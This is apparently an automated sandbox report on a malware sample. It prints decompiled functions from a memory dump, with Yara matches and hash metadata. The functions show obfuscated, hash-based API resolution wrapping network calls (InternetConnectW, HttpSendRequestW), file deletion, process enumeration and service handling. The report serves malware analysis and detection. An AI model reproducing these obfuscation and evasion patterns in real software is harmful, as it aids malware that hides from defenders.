                                          				_push(_a36);
                                          				_push(_a32);
                                          				_push(_a28);
                                          				_push(_a24);
                                          				_push(0);
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(0);
                                          				_push(_a4);
                                          				_push(__ecx & 0x0000ffff);
                                          				E006F602B(__ecx & 0x0000ffff);
                                          				_v24 = 0x1f9770;
                                          				_v20 = 0x380697;
                                          				_v16 = 0;
                                          				_v12 = 0x6440;
                                          				_v12 = _v12 * 0xf;
                                          				_v12 = _v12 * 0x65;
                                          				_v12 = _v12 ^ 0x02513e1b;
                                          				_v8 = 0x9d26;
                                          				_v8 = _v8 << 0xa;
                                          				_v8 = _v8 ^ 0x42bae3e2;
                                          				_v8 = _v8 + 0x19dc;
                                          				_v8 = _v8 ^ 0x40ce99cc;
                                          				E007007A9(0x73a58955, 0x1f801b8, __ecx, __ecx, 0x1fa);
                                          				_t41 = InternetConnectW(_a44, _a36, _t47, 0, 0, _a32, 0, 0); // executed
                                          				return _t41;
                                          			}











                                          APIs
                                          • InternetConnectW.WININET(?,?,?,00000000,00000000,?,00000000,00000000), ref: 00707A07
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2341899738.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true
                                          • Associated: 00000013.00000002.2341892617.00000000006F0000.00000004.00000001.sdmp
                                          • Associated: 00000013.00000002.2341918985.000000000070C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ConnectInternet
                                          • String ID:
                                          • API String ID: 3050416762-0
                                          • Opcode ID: a5cc7dfa8e1f578d9882cc34f057ad90facde6536c1dd8886fbecc1955af6ef0
                                          • Instruction ID: f3e8e5b8db0181c7133055656fc65bc453a9655b10eca4700fda880ce90a7dec
                                          • Opcode Fuzzy Hash: a5cc7dfa8e1f578d9882cc34f057ad90facde6536c1dd8886fbecc1955af6ef0
                                          • Instruction Fuzzy Hash: 53211372800248BBCF119F92CD09CDFBFB9EF89718F108199F90566120D7719A60DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 43%
                                          			E0070375D(void* __edx, WCHAR* _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, DWORD* _a32, intOrPtr _a36, intOrPtr _a44, intOrPtr _a52) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				WCHAR* _v16;
                                          				WCHAR* _v20;
                                          				intOrPtr _v24;
                                          				intOrPtr _v28;
                                          				void* _t35;
                                          				int _t42;
                                          				signed int _t43;
                                          
                                          				_push(_a52);
                                          				_push(0);
                                          				_push(_a44);
                                          				_push(0);
                                          				_push(_a36);
                                          				_push(_a32);
                                          				_push(0);
                                          				_push(_a24);
                                          				_push(_a20);
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(0);
                                          				_push(0);
                                          				_push(0);
                                          				E006F602B(_t35);
                                          				_v28 = 0x6b2c80;
                                          				_v24 = 0x4fb02;
                                          				_v20 = 0;
                                          				_v16 = 0;
                                          				_v8 = 0xe6a1;
                                          				_v8 = _v8 ^ 0xa0873718;
                                          				_v8 = _v8 + 0xffffab24;
                                          				_v8 = _v8 ^ 0x2595dee0;
                                          				_v8 = _v8 ^ 0x8512f71c;
                                          				_v12 = 0x8058;
                                          				_t43 = 5;
                                          				_v12 = _v12 / _t43;
                                          				_v12 = _v12 ^ 0x000051c4;
                                          				E007007A9(0xb356cba0, 0x9164b7cc, _t43, _t43, 0x178);
                                          				_t42 = GetVolumeInformationW(_a12, 0, 0, _a32, 0, 0, 0, 0); // executed
                                          				return _t42;
                                          			}













                                          APIs
                                          • GetVolumeInformationW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0070380A
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2341899738.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true
                                          • Associated: 00000013.00000002.2341892617.00000000006F0000.00000004.00000001.sdmp
                                          • Associated: 00000013.00000002.2341918985.000000000070C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: InformationVolume
                                          • String ID:
                                          • API String ID: 2039140958-0
                                          • Opcode ID: 6496ad685a24056dcbb86ceb1cdfa10e7083617a585bea956de5cffdf49062df
                                          • Instruction ID: 07c422d10f05483433b4c935fac93bba4b79f1fc963eb2d513c1af9277761eac
                                          • Opcode Fuzzy Hash: 6496ad685a24056dcbb86ceb1cdfa10e7083617a585bea956de5cffdf49062df
                                          • Instruction Fuzzy Hash: F41129B1802219BBCF55DF95DD098DF7FB9EF4A360F104148F90862160C7B14A64DBE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 31%
                                          			E006FB566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				void* _t32;
                                          				void* _t38;
                                          				long _t47;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a48);
                                          				_t47 = __edx;
                                          				_push(_a44);
                                          				_push(_a40);
                                          				_push(_a36);
                                          				_push(_a32);
                                          				_push(_a28);
                                          				_push(_a24);
                                          				_push(0);
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__edx);
                                          				_push(0);
                                          				E006F602B(_t32);
                                          				_v8 = 0xfd14;
                                          				_v8 = _v8 >> 4;
                                          				_v8 = _v8 * 0x7a;
                                          				_v8 = _v8 >> 9;
                                          				_v8 = _v8 ^ 0x00002bef;
                                          				_v12 = 0x4f26;
                                          				_v12 = _v12 | 0xe7e97f76;
                                          				_v12 = _v12 ^ 0xe7e94dbb;
                                          				E007007A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
                                          				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
                                          				return _t38;
                                          			}









                                          APIs
                                          • CreateFileW.KERNEL32(A45C8003,?,9C67384B,00000000,0ADDA027,53345D77,00000000), ref: 006FB5FD
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2341899738.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true
                                          • Associated: 00000013.00000002.2341892617.00000000006F0000.00000004.00000001.sdmp
                                          • Associated: 00000013.00000002.2341918985.000000000070C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 9acf8576e3394791eb4e7fd0c5ab37ca1dcf6349e082c5cec40e4e9b6d9fd2f2
                                          • Instruction ID: 45cee30b9e7ae41b342cf837d0c8a9aa609397758199f8df1757f54c9cee0e0d
                                          • Opcode Fuzzy Hash: 9acf8576e3394791eb4e7fd0c5ab37ca1dcf6349e082c5cec40e4e9b6d9fd2f2
                                          • Instruction Fuzzy Hash: 2F11B272801248FBDF56DF95DD06CEE7FBAEF89314F148198FA1862160D3769A20EB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 37%
                                          			E007036D3(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _v24;
                                          				intOrPtr _v28;
                                          				void* _t23;
                                          				intOrPtr* _t30;
                                          				void* _t31;
                                          				void* _t32;
                                          				signed int _t34;
                                          				void* _t41;
                                          
                                          				_t41 = __edx;
                                          				_t32 = __ecx;
                                          				E006F602B(_t23);
                                          				_v28 = 0x12ca0f;
                                          				asm("stosd");
                                          				asm("stosd");
                                          				_t34 = 0x2d;
                                          				asm("stosd");
                                          				_v8 = 0xdb27;
                                          				_v8 = _v8 >> 9;
                                          				_v8 = _v8 / _t34;
                                          				_v8 = _v8 ^ 0x000020cb;
                                          				_v12 = 0x489;
                                          				_v12 = _v12 | 0x46cddb89;
                                          				_v12 = _v12 ^ 0x46cde771;
                                          				_t30 = E007007A9(0x9dd48097, 0x9164b7cc, _t34, _t34, 0x113);
                                          				_t31 =  *_t30(_t32, _t41, __ecx, __edx, _a4, _a8); // executed
                                          				return _t31;
                                          			}














                                          APIs
                                          • ProcessIdToSessionId.KERNEL32(00000000,00000000,?,?,?,?,00000000,1B7BC3FB,?), ref: 00703754
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2341899738.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true
                                          • Associated: 00000013.00000002.2341892617.00000000006F0000.00000004.00000001.sdmp
                                          • Associated: 00000013.00000002.2341918985.000000000070C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ProcessSession
                                          • String ID:
                                          • API String ID: 3779259828-0
                                          • Opcode ID: 6deb829caf7ef43e93cab8b3b2866dc601534bac041292c3f842473e6acf7ff5
                                          • Instruction ID: 2b587c93d054544a4faecb214f2869b3e510d0e865085207b14ba78e16e97eae
                                          • Opcode Fuzzy Hash: 6deb829caf7ef43e93cab8b3b2866dc601534bac041292c3f842473e6acf7ff5
                                          • Instruction Fuzzy Hash: DC01D271A00208FBEB04DBA8DC4A9EFBFB4EF84364F208089EA04A7251D7751F1087A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 37%
                                          			E006F1132(void* __ecx, intOrPtr _a8, void* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, _Unknown_base(*)()* _a32) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				void* _t27;
                                          				void* _t33;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(0);
                                          				_push(_a32);
                                          				_push(_a28);
                                          				_push(_a24);
                                          				_push(_a20);
                                          				_push(_a16);
                                          				_push(0);
                                          				_push(_a8);
                                          				_push(0);
                                          				_push(0);
                                          				_push(__ecx);
                                          				E006F602B(_t27);
                                          				_v12 = 0xe2c5;
                                          				_v12 = _v12 * 0x1f;
                                          				_v12 = _v12 | 0x070d55ff;
                                          				_v12 = _v12 ^ 0x071f7e34;
                                          				_v8 = 0x91c3;
                                          				_v8 = _v8 + 0xffff5023;
                                          				_v8 = _v8 << 0xd;
                                          				_v8 = _v8 >> 1;
                                          				_v8 = _v8 ^ 0x7e1e17b8;
                                          				E007007A9(0x4bc4bb1d, 0x9164b7cc, __ecx, __ecx, 0x235);
                                          				_t33 = CreateThread(0, 0, _a32, _a16, 0, 0); // executed
                                          				return _t33;
                                          			}








                                          APIs
                                          • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 006F11BA
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2341899738.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true
                                          • Associated: 00000013.00000002.2341892617.00000000006F0000.00000004.00000001.sdmp
                                          • Associated: 00000013.00000002.2341918985.000000000070C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CreateThread
                                          • String ID:
                                          • API String ID: 2422867632-0
                                          • Opcode ID: cb0553482c322abf97d8835eeb0e28c15587e3b703a410a188fde19c900adf13
                                          • Instruction ID: 099d28402a32e6d61cc6b2863a37fa5580d55d31eb66abb3d5bc50cefcc6671c
                                          • Opcode Fuzzy Hash: cb0553482c322abf97d8835eeb0e28c15587e3b703a410a188fde19c900adf13
                                          • Instruction Fuzzy Hash: 2D01F77290221DBBCF15DFA5DD49CDFBFB9EF09254F104188FA0962250D2769A60DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E00708422(void* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8, void* _a12, long _a16, intOrPtr _a24, void* _a28) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				intOrPtr _v24;
                                          				intOrPtr _v28;
                                          				void* _t33;
                                          				int _t40;
                                          
                                          				_push(_a28);
                                          				_push(_a24);
                                          				_push(0xffffffff);
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E006F602B(_t33);
                                          				_v20 = _v20 & 0x00000000;
                                          				_v16 = _v16 & 0x00000000;
                                          				_v28 = 0x2f14d8;
                                          				_v24 = 0x27cc4d;
                                          				_v8 = 0xcfda;
                                          				_v8 = _v8 << 7;
                                          				_v8 = _v8 * 0x1b;
                                          				_v8 = _v8 ^ 0xd01d7588;
                                          				_v8 = _v8 ^ 0xdae8f2b7;
                                          				_v12 = 0x64c6;
                                          				_v12 = _v12 * 0x48;
                                          				_v12 = _v12 ^ 0x001c0252;
                                          				E007007A9(0x234ee083, 0x1f801b8, __ecx, __ecx, 0x11c);
                                          				_t40 = HttpSendRequestW(_a12, _a8, 0xffffffff, _a28, _a16); // executed
                                          				return _t40;
                                          			}












                                          APIs
                                          • HttpSendRequestW.WININET(00000000,00000000,000000FF,?,0027CC4D), ref: 007084BE
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2341899738.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true
                                          • Associated: 00000013.00000002.2341892617.00000000006F0000.00000004.00000001.sdmp
                                          • Associated: 00000013.00000002.2341918985.000000000070C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: HttpRequestSend
                                          • String ID:
                                          • API String ID: 360639707-0
                                          • Opcode ID: f6379289a10fe4900e83e69250910bd8ee8d1d9b0766bbc90ede220326e709f7
                                          • Instruction ID: e11ebea158a2dca67859d0c0ac914c47bafd019334429a283cd549e2f1556e3d
                                          • Opcode Fuzzy Hash: f6379289a10fe4900e83e69250910bd8ee8d1d9b0766bbc90ede220326e709f7
                                          • Instruction Fuzzy Hash: A81116B180120DFFCF05DF94CD469AEBFB6AB44314F208288F924662A1C3768B249B80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 54%
                                          			E0070981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t22;
                                          				void* _t28;
                                          				void* _t34;
                                          				long _t37;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a16);
                                          				_t34 = __edx;
                                          				_t37 = __ecx;
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__edx);
                                          				_push(__ecx);
                                          				E006F602B(_t22);
                                          				_v12 = 0xe68;
                                          				_v12 = _v12 * 0x39;
                                          				_v12 = _v12 ^ 0xd1b1d871;
                                          				_v12 = _v12 ^ 0xd1b2fb7e;
                                          				_v8 = 0x629e;
                                          				_v8 = _v8 + 0xfffff5da;
                                          				_v8 = _v8 | 0xbef7b77b;
                                          				_v8 = _v8 ^ 0xbef79fc3;
                                          				E007007A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
                                          				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
                                          				return _t28;
                                          			}










                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00001000,?,?,?,006F87F2,0000CAAE,0000510C,AD82F196), ref: 0070989B
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2341899738.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true
                                          • Associated: 00000013.00000002.2341892617.00000000006F0000.00000004.00000001.sdmp
                                          • Associated: 00000013.00000002.2341918985.000000000070C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 8a0768dde0e7bf2d58d74200d499b49337f1603158062c9f943970ef98f7e083
                                          • Instruction ID: 9c8c09317b007f7bd86bad20a98775aa15cd9fb6c1f63d776a9811ab922738d1
                                          • Opcode Fuzzy Hash: 8a0768dde0e7bf2d58d74200d499b49337f1603158062c9f943970ef98f7e083
                                          • Instruction Fuzzy Hash: 05018872801208FBDB04EF95D8468DFBFB9EF85310F108188F908A6220E6715A219BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 76%
                                          			E00709AC7(void* __ecx, void* __edx, struct tagPROCESSENTRY32W _a4, intOrPtr _a8, void* _a12) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t26;
                                          				int _t33;
                                          				signed int _t35;
                                          
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				E006F602B(_t26);
                                          				_v12 = 0x3a37;
                                          				_t35 = 0x5f;
                                          				_v12 = _v12 / _t35;
                                          				_v12 = _v12 << 3;
                                          				_v12 = _v12 ^ 0x0000271a;
                                          				_v8 = 0x41ad;
                                          				_v8 = _v8 ^ 0xae17da57;
                                          				_v8 = _v8 + 0xffff40f3;
                                          				_v8 = _v8 ^ 0xae16a338;
                                          				E007007A9(0xfb40698d, 0x9164b7cc, _t35, _t35, 0x16d);
                                          				_t33 = Process32NextW(_a12, _a4); // executed
                                          				return _t33;
                                          			}









                                          APIs
                                          • Process32NextW.KERNEL32(DDC40DBA,0000271A), ref: 00709B3F
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2341899738.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true
                                          • Associated: 00000013.00000002.2341892617.00000000006F0000.00000004.00000001.sdmp
                                          • Associated: 00000013.00000002.2341918985.000000000070C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: NextProcess32
                                          • String ID:
                                          • API String ID: 1850201408-0
                                          • Opcode ID: 6b7eb41694d76787e9a8305cca19d9506a715d0ec903bcb9295f44bd3fa0cb58
                                          • Instruction ID: 236eb1ac0cb3144f19bfb54ae0cee24200e9bd69f65b059ce104ef5c229cd7c2
                                          • Opcode Fuzzy Hash: 6b7eb41694d76787e9a8305cca19d9506a715d0ec903bcb9295f44bd3fa0cb58
                                          • Instruction Fuzzy Hash: EF014BB190020CFFEF04DFA4CD4A9AEBFB5EF45350F108198F609A6291D7B65B609B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E006F7663(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t22;
                                          				intOrPtr* _t26;
                                          				void* _t27;
                                          
                                          				E006F602B(_t22);
                                          				_v12 = 0xe6d;
                                          				_v12 = _v12 | 0x830368b1;
                                          				_v12 = _v12 ^ 0x83037da7;
                                          				_v8 = 0xe4f2;
                                          				_v8 = _v8 << 0xc;
                                          				_v8 = _v8 << 5;
                                          				_v8 = _v8 ^ 0xc9e423b1;
                                          				_t26 = E007007A9(0xeb8f70d2, 0x9164b7cc, __ecx, __ecx, 0xc5);
                                          				_t27 =  *_t26(_a4, 0, _a8, _a12, __ecx, __edx, _a4, _a8, _a12, 0, _a20, __ecx, __ecx); // executed
                                          				return _t27;
                                          			}









                                          APIs
                                          • QueryFullProcessImageNameW.KERNEL32(83037DA7,00000000,?,?,?,?,?,?,006F620E,00000000,?,?), ref: 006F76D5
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2341899738.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true
                                          • Associated: 00000013.00000002.2341892617.00000000006F0000.00000004.00000001.sdmp
                                          • Associated: 00000013.00000002.2341918985.000000000070C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: FullImageNameProcessQuery
                                          • String ID:
                                          • API String ID: 3578328331-0
                                          • Opcode ID: bb76f6c44c895bfb25ee897b27b410d4dad05f10fad42bd9a76b8a10b629559e
                                          • Instruction ID: 2fb84f990bc58842e4fbbf5e6811c75bea0710818c898c6cd44f19f997971163
                                          • Opcode Fuzzy Hash: bb76f6c44c895bfb25ee897b27b410d4dad05f10fad42bd9a76b8a10b629559e
                                          • Instruction Fuzzy Hash: C5011D7590020DFFEF059F90CC06EAE7FB5EF44754F10819CFA1566261D6729B609B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E00709A56(void* __ecx, void* __edx, intOrPtr _a4) {
                                          				signed int _v8;
                                          				unsigned int _v12;
                                          				void* _t18;
                                          				intOrPtr* _t22;
                                          				void* _t23;
                                          				void* _t28;
                                          				void* _t29;
                                          
                                          				_t29 = __ecx;
                                          				E006F602B(_t18);
                                          				_v12 = 0x9a38;
                                          				_v12 = _v12 >> 5;
                                          				_v12 = _v12 ^ 0x00004339;
                                          				_v8 = 0x299d;
                                          				_v8 = _v8 + 0xa1ce;
                                          				_v8 = _v8 | 0xc5f89a67;
                                          				_v8 = _v8 + 0x125d;
                                          				_v8 = _v8 ^ 0xc5f8b599;
                                          				_t22 = E007007A9(0x9f217491, 0x9164b7cc, __ecx, __ecx, 0x24e);
                                          				_t23 =  *_t22(_t29, __ecx, __edx, _a4, _t28, __ecx, __ecx); // executed
                                          				return _t23;
                                          			}











                                          APIs
                                          • GetNativeSystemInfo.KERNEL32(?), ref: 00709AC0
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2341899738.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true
                                          • Associated: 00000013.00000002.2341892617.00000000006F0000.00000004.00000001.sdmp
                                          • Associated: 00000013.00000002.2341918985.000000000070C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: InfoNativeSystem
                                          • String ID:
                                          • API String ID: 1721193555-0
                                          • Opcode ID: d65cde782a32ae4a61f5c671309387e83e2548c40be7c0fa0ef700a92d4bef80
                                          • Instruction ID: 45bfdd3a429212a69a8ceb7245ab464e2c48ee7041654c62e186cd5d94a27015
                                          • Opcode Fuzzy Hash: d65cde782a32ae4a61f5c671309387e83e2548c40be7c0fa0ef700a92d4bef80
                                          • Instruction Fuzzy Hash: 03F037B1901218FFEB08DB94D94A8DEBAB8EF42324F208188F40466240E7B51F548BA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E0070AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                          				signed int _v8;
                                          				unsigned int _v12;
                                          				void* _t21;
                                          				int _t27;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E006F602B(_t21);
                                          				_v12 = 0xcc49;
                                          				_v12 = _v12 << 6;
                                          				_v12 = _v12 >> 2;
                                          				_v12 = _v12 ^ 0x000ca988;
                                          				_v8 = 0x5d85;
                                          				_v8 = _v8 | 0xb9d19a55;
                                          				_v8 = _v8 * 0xd;
                                          				_v8 = _v8 ^ 0x6fa87272;
                                          				E007007A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
                                          				_t27 = DeleteFileW(_a12); // executed
                                          				return _t27;
                                          			}








                                          APIs
                                          • DeleteFileW.KERNEL32(?,?,?,?,A6E18774,?,?), ref: 0070AAA8
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2341899738.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true
                                          • Associated: 00000013.00000002.2341892617.00000000006F0000.00000004.00000001.sdmp
                                          • Associated: 00000013.00000002.2341918985.000000000070C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteFile
                                          • String ID:
                                          • API String ID: 4033686569-0
                                          • Opcode ID: 7e7ec6139e26a230cd8135b14def708b179dcfffbd3619458be635df9660073b
                                          • Instruction ID: f07317842d7f1cfa12af78b307ad7322b6e04794baad9ec54bf25dacedc686a1
                                          • Opcode Fuzzy Hash: 7e7ec6139e26a230cd8135b14def708b179dcfffbd3619458be635df9660073b
                                          • Instruction Fuzzy Hash: DFF069B190020CFFDF08DF94DD4A99EBFB5EB41304F108188F905A6250D3B69B649B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 70%
                                          			E006F5FB2(void* __ecx, void* __edx, void* _a4) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t21;
                                          				int _t27;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E006F602B(_t21);
                                          				_v12 = 0x33d;
                                          				_v12 = _v12 + 0xc3dc;
                                          				_v12 = _v12 | 0x39ccfb02;
                                          				_v12 = _v12 ^ 0x39ccf342;
                                          				_v8 = 0xe8d9;
                                          				_v8 = _v8 * 0x16;
                                          				_v8 = _v8 | 0x4145347f;
                                          				_v8 = _v8 ^ 0x9035ef96;
                                          				_v8 = _v8 ^ 0xd1609914;
                                          				E007007A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
                                          				_t27 = CloseServiceHandle(_a4); // executed
                                          				return _t27;
                                          			}








                                          APIs
                                          • CloseServiceHandle.ADVAPI32(39CCF342), ref: 006F6025
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2341899738.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true
                                          • Associated: 00000013.00000002.2341892617.00000000006F0000.00000004.00000001.sdmp
                                          • Associated: 00000013.00000002.2341918985.000000000070C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandleService
                                          • String ID:
                                          • API String ID: 1725840886-0
                                          • Opcode ID: 3cfd88833e1ee3d7eb973bd6275b1c25da7f4a486528241d7f18c0759c34379f
                                          • Instruction ID: 769c5e9c67a2d742db81df34c261f847074929c25c9e5cfca6dcae3568ff5524
                                          • Opcode Fuzzy Hash: 3cfd88833e1ee3d7eb973bd6275b1c25da7f4a486528241d7f18c0759c34379f
                                          • Instruction Fuzzy Hash: B1F03CB0811208FFDB48DFA0E94689EBFB9EB40300F208198E509A7260E7755F159F54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 62%
                                          			E007008F3(void* __ecx, void* __edx, intOrPtr _a4, void* _a8, void* _a16, intOrPtr _a20) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				void* _t25;
                                          				int _t30;
                                          
                                          				_push(_a20);
                                          				_push(_a16);
                                          				_push(0);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E006F602B(_t25);
                                          				_v16 = _v16 & 0x00000000;
                                          				_v24 = 0x46cbed;
                                          				_v20 = 0x1c9af6;
                                          				_v12 = 0xe082;
                                          				_v12 = _v12 ^ 0xd02c06b1;
                                          				_v12 = _v12 ^ 0xd02caa6a;
                                          				_v8 = 0x35e8;
                                          				_v8 = _v8 + 0xc4cf;
                                          				_v8 = _v8 | 0x01443563;
                                          				_v8 = _v8 ^ 0x0144db01;
                                          				E007007A9(0x1da2f3a3, 0x9164b7cc, __ecx, __ecx, 6);
                                          				_t30 = HeapFree(_a16, 0, _a8); // executed
                                          				return _t30;
                                          			}











                                          APIs
                                          • HeapFree.KERNEL32(0046CBED,00000000,00000000), ref: 00700978
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2341899738.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true
                                          • Associated: 00000013.00000002.2341892617.00000000006F0000.00000004.00000001.sdmp
                                          • Associated: 00000013.00000002.2341918985.000000000070C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: f42bd0ef6022b4f02df29764bbac16bfa4de81bff675cec10e0bdee2996b28b4
                                          • Instruction ID: 6ae2b4cbdf856222676fdc8a3f7c3e15fe1b293487186bc8155f827b9040bd65
                                          • Opcode Fuzzy Hash: f42bd0ef6022b4f02df29764bbac16bfa4de81bff675cec10e0bdee2996b28b4
                                          • Instruction Fuzzy Hash: AE015EB580020CFFEF05DFD4C946B9E7FB5AF44708F108188B904662A1D3B65B249B95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions